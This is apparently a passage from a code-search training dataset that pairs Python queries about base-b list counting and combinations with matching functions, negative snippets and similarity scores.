n=20):\n R = [[0.5 * (b - a) * (f(a) + f(b))]] # R[0][0]\n for n in range (1,n+1):\n h = float(b-a)/2**n\n R.append((n+1)*[None]) # Add an empty row.\n R[n][0] = 0.5*R[n-1][0] + h*sum(f(a+(2*k-1)*h) for k in range(1, 2**(n-1)+1)) # for proper limits\n for m in range(1, n+1):\n R[n][m] = R[n][m-1] + (R[n][m-1] - R[n-1][m-1]) / (4**m - 1)\n return R[n][n]", "def F(x):\n return math.exp(-0.5 * (x ** 2))", "def bspe(a, b):\n if b-a == 1:\n return MPZ_ONE, MPZ(b)\n m = (a+b)//2\n p1, q1 = bspe(a, m)\n p2, q2 = bspe(m, b)\n return p1*q2+p2, q1*q2", "def get_delta_v_tot(f, e, a, P):\n\n coeff = (2.0*np.pi/P) * a / np.sqrt(1.0 - e*e)\n delta_v_tot = coeff * (1.0 + 2.0*e*np.cos(f) + e*e) / 1.0e5\n\n return delta_v_tot", "def agm_fixed(a, b, prec):\n i = 0\n while 1:\n anew = (a+b)>>1\n if i > 4 and abs(a-anew) < 8:\n return a\n b = isqrt_fast(a*b)\n a = anew\n i += 1\n return a", "def float(x) -> float:\n pass", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def beat_division(a,b):\n if b == 0:\n return 0\n return a // b", "def force(m: float, a):\n return m * a" ]
[ "0.65174574", "0.6448639", "0.63864565", "0.6370828", "0.6296283", "0.6275515", "0.6270769", "0.6238707", "0.6191305", "0.61809313", "0.618049", "0.6167555", "0.6149057", "0.61406493", "0.61188513", "0.6118763", "0.61178863", "0.60342443", "0.6006515", "0.6004016", "0.6002765", "0.59564394", "0.5937206", "0.5922853", "0.59220946", "0.5883357", "0.5857809", "0.5855197", "0.5830326", "0.582943", "0.5827883", "0.5819967", "0.5819277", "0.58018", "0.5778498", "0.5778282", "0.5772813", "0.57632977", "0.5759403", "0.5759196", "0.5756759", "0.57378423", "0.5728657", "0.572825", "0.5717819", "0.571659", "0.57163197", "0.5706786", "0.5701919", "0.5698739", "0.5687975", "0.5681937", "0.5681592", "0.5678373", "0.56754833", "0.5672732", "0.5668723", "0.566598", "0.5659324", "0.5639906", "0.56381243", "0.56302893", "0.5624189", "0.56020206", "0.56013983", "0.56005806", "0.5590434", "0.55809176", "0.5579702", "0.55767506", "0.5576739", "0.55706793", "0.55588067", "0.5556957", "0.5556457", "0.55536306", "0.55520433", "0.555108", "0.55419314", "0.55414003", "0.5540328", "0.55350614", "0.55345714", "0.5530873", "0.55291164", "0.55273306", "0.5522553", "0.5514987", "0.551164", "0.55065113", "0.5502785", "0.5499345", "0.54956365", "0.549539", "0.5490186", "0.54893154", "0.54864293", "0.5485876", "0.54826945", "0.54810965" ]
0.6965852
0
Increment the list l, interpreted as a number (a sequence of digits), counting in base b
def counter(l,b):
    # Saturating base-b increment: if every digit is already b-1, do nothing.
    if l == [b-1]*len(l):
        return
    i = 1
    while(True):
        if l[-i] < b-1:
            l[-i] += 1
            break
        else:
            # Carry: reset this digit and move one position to the left.
            l[-i] = 0
            i += 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def increment(b): \n if b == 11111111:\n return 00000000\n else:\n b = bin_to_dec(b)\n b = b + 1\n res = dec_to_bin (b)\n if len(res) == 8:\n return res\n else:\n c = 8 - len(res)\n return c*'0' + res", "def next_num():\r\n CHModuleFactory.num += 1\r\n return CHModuleFactory.num", "def next_num():\r\n CHModuleFactory.num += 1\r\n return CHModuleFactory.num", "def incr(val):\r\n n = len(val)\r\n num = int(val, 2)\r\n num += 1\r\n num = bin(num)[2:]\r\n while len(num)<n:\r\n num = '0' + num\r\n return num[len(num)-n:]", "def gera_num_cc(abv):\n \n # Ao recebermos a indicacao de que entidade se pretende gerar um numero, usamos a funcao auxiliar escolhe_iin_comp para escolher aleatoriamente os digitos iniciais e o comprimento do cartao.\n # O numero final comeca por ser os digitos iniciais, juntando a estes, do lado direito, numeros aleatorios ate chegarmos ao comprimento pretendido menos 1. O ultimo digito sera o digito de verificacao.\n \n dig_iniciais , comp = escolhe_iin_comp(abv) \n num_cc = dig_iniciais\n \n for i in range(comp-len(dig_iniciais)-1): \n num_cc = num_cc + str(int(random()*10)) \n \n num_cc = num_cc + digito_verificacao(num_cc)\n \n return int(num_cc)", "def increment_number(self):\n # self.number += 1\n print('fuckwit')\n # print(self.number)", "def increment_counter(self) -> None:", "def ToBase(b, n):\r\n d = []\r\n while n:\r\n d.append(n % b)\r\n n //= b\r\n d.reverse() \r\n return int(''.join(map(str, d)))", "def increase_seq(sequence_number):\n\n sequence_number += 1\n if sequence_number > 0xFFFF:\n sequence_number = 1\n\n return sequence_number", "def next_num(cls):\r\n cls.num += 1\r\n return cls.num", "def inc_num(num):\n return num + 1", "def inc(i):\n i += 1\n return i", "def calc_rec_cycle(number):\n result = 0\n i = 10 ** (int(math.log10(number)) + 1)\n s = set()\n\n while True:\n if i == number or i == 0:\n result = 0\n break\n\n if i < number:\n result += 1\n i *= 10\n continue\n\n # i > n\n r = i % number\n #print('r',r)\n if r not in s:\n result += 1\n s.add(r)\n else:\n break\n\n i = r * 10\n return result", "def increase_counter(self):\n self.values = self.values + 1", "def E_inc(self):\n\n\t\tmaxit = self.num_data + 100\n\n\t\tfor i in range(maxit):\n\t\t\tsqB", "def add_and_allocate_number(self, cb: t.Callable[[EPOLL], None]) -> int:\n number = self.next_number\n # TODO technically we should allocate the lowest unused number\n self.next_number += 1\n self.number_to_cb[number] = cb\n return number", "def fibonacci_number_counter(p):\r\n if p == 0:\r\n return 0\r\n elif p == 1 or p == 2:\r\n return 1\r\n else:\r\n fibonacci_list = [1, 1]\r\n while len(fibonacci_list) < p:\r\n fibonacci_list.append(fibonacci_list[-1] + fibonacci_list[-2])\r\n\r\n return fibonacci_list[-1]", "def int_to_base(n: int, b: int) -> List[int]:\n if n == 0:\n return [0]\n digits = []\n while n:\n digits.append(int(n % b))\n n //= b\n return digits[::-1]", "def renumber():\n\n counter = itertools.count(1)\n while True:\n yield 's%s'%counter.next()", "def increment(val):\n return coerce_to_int(val) + 1", "def next_sequence_num(buf=[0]): # use list as default value to make sure it is\n # initialized only once\n val = buf[0]\n buf[0] += 1\n return val", "def leo_numbers(countt:int, templist=[1,1])->int:\n if countt < 0:\n print(\"Первый аргумент этой функции - натуральное число\")\n elif not (countt or countt-1):\n return 1\n elif countt < len(L):\n return L[countt]\n else:\n while len(L) <= countt:\n L.append(L[-1]+L[-2]+1)\n return L[-1]", "def to_int(a):\n i = 0\n while a:\n i 
+= 1\n a = a.next\n return i", "def next_int(self):\n self.innovation_number += 1\n return self.innovation_number", "def incr(n=1):\n for i in xrange(n):\n pulse_hi(INCR)", "def addNbr (self) :\n #we pick out the random number : 2 or 4\n if random.randint(1,10) == 1:\n randomNbr = 4\n else :\n randomNbr = 2\n\n #we pick a random position for the number\n emptyCounter = 0\n for k in range (4) :\n for i in range (4) :\n if self.grid[k,i] == 0 :\n emptyCounter += 1\n\n randomPosition = random.randint(0,emptyCounter-1)\n counter = 0\n for k in range (4) :\n for i in range (4) :\n if self.grid[k,i] == 0 :\n if (counter == randomPosition) :\n self.grid[k,i] = randomNbr\n return #we leave the function\n counter += 1", "def fibbonachi(num):\n a = 1\n b = 2\n fib = [a, b]\n c = a + b\n while c < num:\n fib.append(c)\n a, b = b, c\n c = a + b\n return fib", "def increment(sequence, seq):\n seq.rollover_len = len(sequence) + 1\n seq.value = sequence[::-1]\n return (SeqGen.next(seq)[::-1])", "def inc_tcp_seq_number(cur_seq: int, inc_by: int) -> int:\n if cur_seq < 0:\n return None\n return (cur_seq + inc_by) % SEQ_NUM_MOD_CONST", "def fibonacci(a):\n fib = [1,1]\n x = 0\n i = 1\n while x < a:\n x = fib [i] + fib[i-1]\n i += 1\n fib.append(x)\n return i, fib", "def calee(num):\n state.inc(num)\n print(\"caleee\")", "def add(iA, iB):\n for i in range(iB):\n iA = iA + 1", "def TransformBase(base:int, number:list, digts:int) -> int :\n i = 0\n res = 0\n while ( i < digts):\n index = digts - i - 1\n number[index] = int(number[index]) * (base ** i) \n res += number[index]\n i += 1\n return res", "def inc(self):\n self._value += 1", "def increase_count(self, number=1):\n self.count += number", "def inc(self):\n \n self.count += 1", "def fibonacci_iterative(nth_nmb: int) -> int:\n old, new = 0, 1\n if nth_nmb in (0, 1):\n return nth_nmb\n for __ in range(nth_nmb - 1):\n old, new = new, old + new\n return new", "def increment(self):\r\n return self.add(1)", "def gen_numb(N:int, M:int, prefix = None):\n\tprefix = prefix or []\n\tif M == 0:\n\t\tprint(prefix)\n\t\treturn\n\tfor digit in range(N):\n\t\tprefix.append(digit)\n\t\tgen_numb(N, M-1, prefix)\n\t\tprefix.pop()", "def inc( self ):\n self.count += 1", "def gen_num(lim=10000):\n n = 1\n yield 2\n yield 3\n while 6 * n + 1 <= lim:\n yield 6 * n - 1\n yield 6 * n + 1\n n += 1", "def fibonacci(num):\n sequence = [1, 1]\n for x in range(num-2):\n sequence.append(sequence[x] + sequence[x+1])\n return sequence", "def fibonacci(n):", "def fibonacci():\n yield 0\n element = yield 1\n previous = element\n while element < 1e100:\n current = yield element\n element = previous + current\n if current > 1:\n previous = current\n\n return element", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def codage(nbr):\n\tmask=1\n\tresult=0\n\tfor index in range(len(G)):\n\t\tif ((mask<<index)&nbr) != 0:\n\t\t\tresult^=G[len(G)-index-1]\n\treturn result", "def postfix_increment(self) -> int:\n result = self._counter\n if self._counter < self._max_value:\n self._counter += 1\n return result", "def increment(self, inc):\n self.done += inc", "def increment(self, index, value):\n self._inrange(index)\n if value==0:\n return\n found,ii = self._find_index(index)\n if found:\n self.value[ii] += value\n if self.value[ii] == 0:\n del self.index[ii]\n del self.value[ii]\n else:\n self.index.insert(ii, index)\n self.value.insert(ii, value)", "def count():\r\n c = eNine.get()\r\n eNine.delete(0, 
END)\r\n count = int(c)\r\n count += 1\r\n eNine.insert(0, count)", "def convertebasenbase10(baseorig, numero):\n base10 = 0\n for i in range(len(numero)-1, -1, -1):\n base10 += DIGITOS.index(numero[i]) * baseorig**(len(numero)-i-1)\n\n return base10", "def increase(self):\n self.counter[0] += 1\n\n for x in range(len(self.sequences) -1):\n if self.counter[x] == len(self.sequences[x]) + 1:\n self.counter[x] = 0\n self.counter[x+1] += 1", "def lucas(n):\n \n A = 2\n B = 1\n Counter = 1\n C = 0 \n \n while Counter <= n:\n C = A + B\n A = B\n B = C\n Counter = Counter + 1\n if (Counter + 1) == n:\n return C", "def fget(self):\n if not hasattr(self, \"_n\"):\n self._n = 0\n self._n += 1\n return self._n", "def inc_bytes(a):\n out = list(a)\n for i in reversed(range(len(out))):\n if out[i] == 0xFF:\n out[i] = 0\n else:\n out[i] += 1\n break\n return bytes(out)", "def increment(self):\n self.increments += 1\n if self.increments == self.length:\n self.finished = True", "def _inc(self, val):\r\n assert(len(val) == self.sequence_length)\r\n return self.sequence_string[(self.sequence_string.index(val)+1) % len(self.sequence_string)]", "def t_fibonnaci():\n a = 1\n b = 1\n c = a + b\n while True:\n yield c\n a = b + c\n b = c + a \n c = a + b", "def Bnum(n):\n n = int(n)\n a = {}\n for m in xrange(0, n+1):\n a[m] = 1/(m+1)\n for j in reversed(xrange(1, m+1)):\n a[j-1] = j*(a[j-1] - a[j])\n return a[0]", "def incr_registers(self):\n pass", "def increment(self):\n self.data[self.pointer] += 1\n self.data[self.pointer] %= 256", "def _get_next_free_id_(bases, start_index=1):\r\n \r\n biggest_id = int(start_index)\r\n \r\n for base in bases:\r\n current_id = base.get_id()\r\n if current_id != None or current_id != '':\r\n if current_id > biggest_id:\r\n biggest_id = current_id\r\n \r\n return str(int(biggest_id) + 1)", "def increment(cls, value):\r\n value.value += 1", "def fibo(n):\n first = 0\n second = 1\n for i in range (1,n+1):\n if (i<=1): \n #begins sequence (terms 0 and 1 do not have two prior terms)\n newVal = i\n else:\n #continues sequence by adding the previous two numbers in the\n #sequence, and updating the variables\n newVal = first + second\n first = second\n second = newVal\n print(i,newVal)", "def increment(self) -> global___Expression:", "def incrment_1(x):\n return(x + 1)", "def numerize():\n pass", "def numer(self, a):\n raise NotImplementedError", "def progressive_number(qty=None, id_filename=None):\n assert qty is None or qty > 0, \\\n \"Argument `qty` must be a positive integer\"\n if id_filename is None:\n id_filename = os.environ.get('GC3PIE_ID_FILE',\n os.path.expanduser('~/.gc3/next_id.txt'))\n # ensure directory exists, otherwise the error message is obscure;\n # see Issue 486 for details\n id_dirname = dirname(id_filename)\n if not os.path.exists(id_dirname):\n os.makedirs(id_dirname)\n # XXX: can raise 'LockTimeout'\n lck = lock(id_filename, timeout=30, create=True)\n id_file = open(id_filename, 'r+')\n id = int(id_file.read(8) or \"0\", 16)\n id_file.seek(0)\n if qty is None:\n id_file.write(\n \"%08x -- DO NOT REMOVE OR ALTER THIS FILE: it is used internally\"\n \" by the gc3libs\\n\" % (id + 1))\n else:\n id_file.write(\n \"%08x -- DO NOT REMOVE OR ALTER THIS FILE: it is used internally\"\n \" by the gc3libs\\n\" % (id + qty))\n id_file.close()\n unlock(lck)\n if qty is None:\n return id + 1\n else:\n return [(id + n) for n in range(1, qty + 1)]", "def fibonacci(num):\n counter = 0\n\n # Start fibonacci\n sequence = [0, 1]\n while len(sequence) < num:\n n1 = 
sequence[counter]\n n2 = sequence[counter + 1]\n sequence.append(n1+n2)\n\n counter += 1\n\n return sequence", "def _get_next_sequence_number(self):\n cur = self._next_sequence_number\n self._next_sequence_number += 1\n return cur", "def counter(self) -> int:", "def counter(self) -> int:", "def calculate(self, b):\n self.n_steps = self.n_steps + 1\n self.length = b.length\n self.natoms = b.natoms\n for i in range(0,self.natoms-1):\n for j in range(i+1,self.natoms):\n rij = (b.atoms[i].xyz - b.atoms[j].xyz)\n rij = rij - self.pbc_correction(rij)\n mag_rij = la.norm(rij)\n bin_no = int(round(mag_rij/self.dr))\n if bin_no <= self.n_max:\n self.gr[bin_no] = self.gr[bin_no] + 1", "def addition_mod(a, b, nbr):\n bina = [int(x) for x in bin(a)[2:]]\n binb = [int(x) for x in bin(b)[2:]]\n binn = [int(x) for x in bin(nbr)[2:]]\n #print(binn)\n while len(bina) >= len(binb):\n binb = [0]+binb\n while len(bina) < len(binb)-1:\n bina = [0]+bina\n while len(binn) < len(bina):\n binn = [0]+binn\n while len(binn) > len(bina):\n bina = [0]+bina\n binb = [0]+binb\n binn.reverse()\n bina.reverse()\n binb.reverse()\n #print(bina, binb, binn)\n n = len(bina)+len(binb)+len(binn)\n na = len(bina)\n nab = len(bina)+len(binb)\n q = QuantumRegister(n+2, 'q')\n circ = QuantumCircuit(q)\n for i in range(na):\n if bina[i]:\n circ.x(q[i])\n for i in range(len(binb)):\n if binb[i]:\n circ.x(q[na+i])\n for i in range(len(binn)):\n if binn[i]:\n circ.x(q[nab+i])\n addmod(circ, q, # A, B, lost, last, N, lost2, binn):\n [q[i] for i in range(len(bina))],\n [q[i+na] for i in range(len(binb)-1)],\n q[n],\n q[na+len(binb)-1],\n [q[i+nab] for i in range(len(binn))],\n q[n+1],\n binn)\n circ_m = measure(circ, q, [i for i in range(na,nab)])\n return circ_m", "def increment2(cls, var):\r\n var += 1", "def nom(meal, i1):\n # Iterators\n #numOfIts = len(meal)\n #its = [i1 for i1 in range(0,numOfIts)]\n #its = [0,2,1,6, len(meal)]\n #its = createIts(meal)\n numOfIts = len(its)\n \n newnom = 0\n for i2 in range(0,numOfIts):\n newnom += int(meal[its[i2]+i1]) + primes[i2]\n #print(primes[i2])\n #print(\"newnom =\", newnom)\n \n newnom = str(newnom % 10)\n return newnom", "def list2int(thelist,base=2):\n return reduce(lambda x,y:base*x+y,reversed(thelist),0", "def increment(self):\n self.pos += 1\n if self.pos == len(self.progress) - 1:\n self.pos = 0", "def post_seqnoincrease(self):", "def __get_sequence_number(self):\n if self.counter > 999:\n self.counter = 0\n else:\n self.counter += 1\n\n str_sequence_num = self.counter + 256\n str_hex_sequence_num = hex(str_sequence_num)[2:]\n return str_hex_sequence_num", "def increment(self, amount):\n pass", "def base(num,conv,rem=0,baseResult=[]):\r\n if num==0:\r\n strResult=''\r\n for i in baseResult[::-1]:\r\n strResult+=str(i)\r\n return int(strResult)\r\n else:\r\n baseResult.append(num%conv)\r\n return base(num//conv,conv,num%conv,baseResult)", "def counter(self, value: int, /) -> None:", "def RecCountup(n):\n if n == 0:\n return print('0')\n RecCountup(n - 1)\n print(n)", "def safe_incr(self, number: int, addition: int = 1) -> int:\n summed = number + addition\n return summed if summed < TWO_BYTES else summed % TWO_BYTES", "def radix(self) -> int:\n raise NotImplementedError", "def lucas_iter(n):\n f = []\n for x in range(n + 1):\n if x == 0:\n f.append(2)\n elif x == 1:\n f.append(1)\n else:\n f.append(f[-1] + f[-2])\n return f[-1]", "def num_to_idx(cls, num: int, n_chaps: int) -> int:\n if num > 0:\n return num - 1\n if num < 0:\n return n_chaps + num\n return 0", "def count_digit(x, 
i):\n \"\"\" GRAPSTE TON KWDIKA SAS APO KATW \"\"\"\n su = 0\n s = 0\n k = x\n while(i>1):\n x = x//10\n i = i-1\n s = x%10\n while(k>0):\n if((k%10)==s):\n su = su + 1\n k = k//10\n return su", "def ccw(i):\n return (i + 1) % 3", "def PRGA_custom(tab):\n i = 0\n j = 0\n while True:\n i = (i + 1) % MOD\n j = (j + tab[i]) % MOD\n yield i+j", "def cyclic_index_i_plus_1(i, length):\n return i + 1 if i + 1 < length else 0", "def I (self, n):", "def increment_count(self):\n self.image_count +=1\n if self.image_count > self.max_count:\n self.image_count = self.count_start # overflow", "def getNextOrderNum(cur,vID):\n orderNum = execute_query(cur,\"\"\"SELECT Count(*) FROM OpenTasks where vID = ?\"\"\", [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum", "def increment(self, n=1):\n with self.current_counter.get_lock():\n self.current_counter.value += n", "def get_seq_num():\n t = datetime.datetime.now()\n mt = time.mktime(t.timetuple())\n nextnum = int(mt)\n retval = nextnum % 10000000\n return retval", "def plusOne(self, digits: List[int]) -> List[int]:\n n = len(digits)\n for i in reversed(range(n)):\n # set all the nines at the end of array to zeros\n if digits[i] == 9:\n digits[i] = 0\n\n # here we have the rightmost not-nine \n else:\n # increase this rightmost not-nine by 1\n digits[i] += 1\n #done\n return digits\n\n # we're here because all the digits are nines\n return [1] + digits", "def incr_id(id, n):\n return id[:-1] + (id[-1] + n,)" ]
[ "0.67676866", "0.62549233", "0.62549233", "0.6254061", "0.62319183", "0.6182245", "0.6147752", "0.608569", "0.60396475", "0.60262215", "0.5960267", "0.5946531", "0.5906772", "0.58969176", "0.58864105", "0.5877408", "0.58636934", "0.58469784", "0.5830072", "0.5778208", "0.5726589", "0.5720135", "0.56943625", "0.5676869", "0.5660773", "0.56565106", "0.565127", "0.5621926", "0.56209505", "0.55911636", "0.55893856", "0.55871785", "0.55822045", "0.5572834", "0.55521375", "0.55486614", "0.5536826", "0.5525152", "0.5524839", "0.55225337", "0.55191326", "0.5512361", "0.5495489", "0.54851437", "0.54652727", "0.5462349", "0.5443118", "0.5439216", "0.54369164", "0.5432487", "0.543237", "0.54216814", "0.54157054", "0.54088557", "0.5401402", "0.5398678", "0.53788805", "0.53759205", "0.5374503", "0.53727573", "0.5357067", "0.53562427", "0.53498447", "0.5339844", "0.53383225", "0.53305686", "0.53304625", "0.53286445", "0.5326938", "0.53222835", "0.53176343", "0.53144103", "0.53144103", "0.5300539", "0.5300124", "0.5289199", "0.5283967", "0.5280124", "0.52659786", "0.5264491", "0.5263976", "0.52632123", "0.5262041", "0.5255409", "0.52540725", "0.5252959", "0.5252761", "0.52457374", "0.52353185", "0.52351004", "0.5231484", "0.52127963", "0.5211072", "0.52058893", "0.52019304", "0.51960593", "0.5195007", "0.51906836", "0.51894164", "0.51812685" ]
0.62286186
5
combinations('ABCD', 2) --> AB AC AD BC BD CD
combinations(range(4), 3) --> 012 013 023 123
def combinations(iterable, r):
    pool = tuple(iterable)
    n = len(pool)
    if r > n:
        return
    indices = list(range(r))
    yield tuple(pool[i] for i in indices)
    while True:
        # Find the rightmost index that can still be advanced.
        for i in reversed(range(r)):
            if indices[i] != i + n - r:
                break
        else:
            return
        indices[i] += 1
        # Reset every index to the right of i to its smallest legal value.
        for j in range(i+1, r):
            indices[j] = indices[j-1] + 1
        yield tuple(pool[i] for i in indices)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def combinations(s, n):\n return (\"\".join(x) for x in tuples(s,n))", "def combinations(*comb, **kw):\n return _fixture_functions.combinations(*comb, **kw)", "def part_2():\n return itertools.permutations(range(5, 10))", "def get_combinations(text):\n combinations = []\n arr = []\n slen = len(text)\n __find_factor(slen,slen,combinations,arr)\n \n elements = []\n for comb in combinations:\n tmp = [0] + comb\n elements.append([text[tmp[i]:tmp[i]+tmp[i+1]] for i in range(len(tmp)-1)])\n return elements", "def test_combinations(self):\r\n self.assertFloatEqual(combinations(5, 3), 10)\r\n self.assertFloatEqual(combinations(5, 2), 10)\r\n # only one way to pick no items or the same number of items\r\n self.assertFloatEqual(combinations(123456789, 0), 1)\r\n self.assertFloatEqual(combinations(123456789, 123456789), 1)\r\n # n ways to pick one item\r\n self.assertFloatEqual(combinations(123456789, 1), 123456789)\r\n # n(n-1)/2 ways to pick 2 items\r\n self.assertFloatEqual(\r\n combinations(\r\n 123456789,\r\n 2),\r\n 123456789 *\r\n 123456788 /\r\n 2)\r\n # check an arbitrary value in R\r\n self.assertFloatEqual(combinations(1234567, 12), 2.617073e64)", "def CombinationMethods(nums, elements_number):\n res = list(c(nums, elements_number))\n return res, Combination(len(nums), elements_number)", "def exercise_b2_2():\r\n letters = ['a', 'e', 'i', 'o', 'u', 'u']\r\n combinations = list(permutations(letters))\r\n uniq_combinations = set(combinations)\r\n total_possibilities = len(combinations)\r\n total_uniq_possibilities = len(uniq_combinations)\r\n print(\"\\nThere are %s possible combinations and %s unique combinations for this set\\n\" \r\n % (total_possibilities, total_uniq_possibilities))\r\n return", "def test_n_choose_n(self):\n self.assertEqual(wordlib.combinations(5, 5), 1)", "def AllCombinations(data, comblength):\n return [c for c in itertools.combinations(data, comblength)]", "def _combinations(n_features, n_args, interaction_only):\n comb = combinations if interaction_only else combinations_w_r\n return comb(range(n_features), n_args)", "def part_1():\n return itertools.permutations(range(5))", "def cands(inputs):\n # The below could probably be simplified a bit....\n return map(''.join, list(itertools.chain.from_iterable([ map (list, (itertools.permutations(inputs, x))) for x in range(4, len(inputs)+1)])))", "def get_combo(starting_letter, length): # Apparently ngrams beyond bigrams only have two letter file names. 
Still keeping this for generality, but should always be run with length=2 in this context\n alpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\n 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n combos = list(itertools.combinations(alpha, length - 1))\n combos = [starting_letter + ''.join(item) for item in combos]\n\n return combos", "def generate_alphabet_combinations(length: int = 2) -> List[str]:\n assert length > 0\n alphabets = string.ascii_lowercase\n\n return [\n ''.join(combination)\n for n in range(1, length+1)\n for combination in product(alphabets, repeat=n)\n ]", "def Demo():\n print(Combination(8, 4))\n print(CombinationMethods([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3))", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def part2(data): # pylint: disable=line-too-long\n combinations_up_to = {0: 1}\n for d in sorted(data):\n val = 0\n for i in range(1, 3 + 1):\n if d - i in combinations_up_to:\n val += combinations_up_to[d - i]\n combinations_up_to[d] = val\n return combinations_up_to[max(data)]", "def __combination(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __combination(orgset[i + 1 :], k - 1):\n yield (x,) + s", "def get_pairs(terms):\n return itertools.combinations(terms, 2)", "def representative_combos(list_1: list[str], list_2: list[str]) -> list[tuple[str, str]]:\n all_selected_combinations: list[tuple[str, str]] = []\n for i in range(max(len(list_1), len(list_2))):\n all_selected_combinations.append((list_1[i % len(list_1)], list_2[i % len(list_2)]))\n return all_selected_combinations", "def alpha_chars_pairs (text):\n alpha_text = list (alpha_chars (text))\n return itertools.combinations (alpha_text)", "def get_paren_combos():\n results = [None] * 4\n options = [('%s', '(%s)')]\n for i in range(1, 4):\n results[i] = list(itertools.product(*(i * options)))\n return results", "def combinations(self):\n return self._combinations", "def word_combination(wlist:list) -> list :\r\n\r\n if wlist and len(wlist)>1:\r\n return chain(*map(lambda x: combinations(wlist, x), range(1, len(wlist)+1)))\r\n else :\r\n return wlist", "def generateSubSequences(k, ch):\n seq = [\"\".join(c) for c in itertools.product(ch, repeat = k)]\n# discussion about the best way to do this:\n# https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings\n return seq", "def get_combinations(self):\n all_steps = self.do_steps()\n self.option = [k for k, v in all_steps.items()]\n result = itertools.product(*(v for k, v in all_steps.items()))\n return result", "def perm_2_let():\r\n return {''.join(i) for i in permutations('abcdefghijklmnopqrstuvwxyz', 2)}\r\n # print(comb_2_let, sep='')\r", "def combinations(n, k):\n return factorial(n) / (factorial(k) * factorial(n - k))", "def powerset(xs):\n cards = list(reversed(xrange(len(xs)))) + [len(xs)]\n return list(chain.from_iterable(combinations(xs, n) for n in cards))", "def binary_compositions(n):\n return productrange(*[2]*(n-1))", "def 
powerset(s):\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def pattern_list(k):\r\n p_list=[]\r\n for i in list(itertools.product('ACGT', repeat=k)):\r\n x = ''.join(i)\r\n p_list.append(x)\r\n return p_list", "def test_get_n_bits_combinations():\n # Check n=1 - Pass\n assert layer_util.get_n_bits_combinations(1) == [[0], [1]]\n # Check n=2 - Pass\n assert layer_util.get_n_bits_combinations(2) == [[0, 0], [0, 1], [1, 0], [1, 1]]\n\n # Check n=3 - Pass\n assert layer_util.get_n_bits_combinations(3) == [\n [0, 0, 0],\n [0, 0, 1],\n [0, 1, 0],\n [0, 1, 1],\n [1, 0, 0],\n [1, 0, 1],\n [1, 1, 0],\n [1, 1, 1],\n ]", "def estimateCombinations(self):\n\n # Note: We use floating point, not exact arithmetic.\n allCharsCount = 0.0\n combinations = 1.0\n\n # Count combinations for the forced characters.\n for chars in self.categories:\n combinations *= len(chars)\n allCharsCount += len(chars)\n\n # Multiply by combinations for the unforced characters.\n combinations *= allCharsCount ** (self.length - len(self.categories))\n\n return combinations", "def generate_combinations(k: int, n: int):\n result = list()\n for i in range(1, k + 1):\n for bits in itertools.combinations(range(n), i):\n s = [0] * n\n for bit in bits:\n s[bit] = 1\n result.append(s)\n\n return pd.DataFrame(result)", "def allcombinations(orgset, k):\n return itertools.chain(*[combination(orgset, i) for i in range(1, k + 1)])", "def corner_combinations(zdim: int):\n return combinations(range(zdim), 2)", "def power_1(s):\n from itertools import combinations\n return [list(c) for i in range(len(s) + 1) for c in combinations(s, i)]", "def TAoCPpermutation(n,k):\n perms = []\n for subset in itertools.combinations(range(n), k):\n A = []; B = []; C = []; min = 0; j = 0; up = 0\n for i in xrange(n):\n if(j>=k or i != subset[j]):\n B.append(i)\n up +=1\n else:\n up -=1\n j += 1\n if(up < min):\n min = up\n B.append(i)\n else:\n A.append(i)\n C.append(B.pop())\n perms.append(A+B+C)\n return perms", "def genSubset2(L):\n import itertools\n result = []\n for i in range(len(L) + 1):\n result += list(itertools.combinations(L, i))\n return result", "def combo(N,K):\n assert type(N)==list\n assert type(K)==int\n for k in N:\n assert type(k)==int\n assert K>0 and K<=len(N)\n \n main_combo = []\n #Finds the power list of the inputted list and loops through the power list for lists with length 'K'.\n for l in power_list(N):\n if len(l)==K:\n main_combo.append(l)\n return main_combo #Returns a list of list combinations with length 'K'.", "def item_combinations(items, combo_range):\n if combo_range.start < 0 or combo_range.stop < 0:\n raise ValueError(\"Range must not be negative\")\n elif (\n combo_range.start == combo_range.stop\n or combo_range.start == 0\n and combo_range.stop == 1\n ):\n # Choices are of length zero\n return []\n\n full_length_combos = []\n if combo_range.start == 0:\n no_choice = [None for _ in range(combo_range.stop - 1)]\n full_length_combos.append(tuple(no_choice))\n combo_range = range(1, combo_range.stop)\n\n expected_length = combo_range.stop - 1\n for length in combo_range:\n combos = itertools.combinations(items, length)\n if length < expected_length:\n combos = [c + tuple([None] * (expected_length - length)) for c in combos]\n full_length_combos.extend(combos)\n\n return full_length_combos", "def combinations(n, k):\r\n return exp(gammaln(n + 1) - gammaln(k + 1) - gammaln(n - k + 1))", "def combos(array,n=2): \n # base case\n if n==0:\n yield frozenset()\n return\n\n # core recursion\n for c 
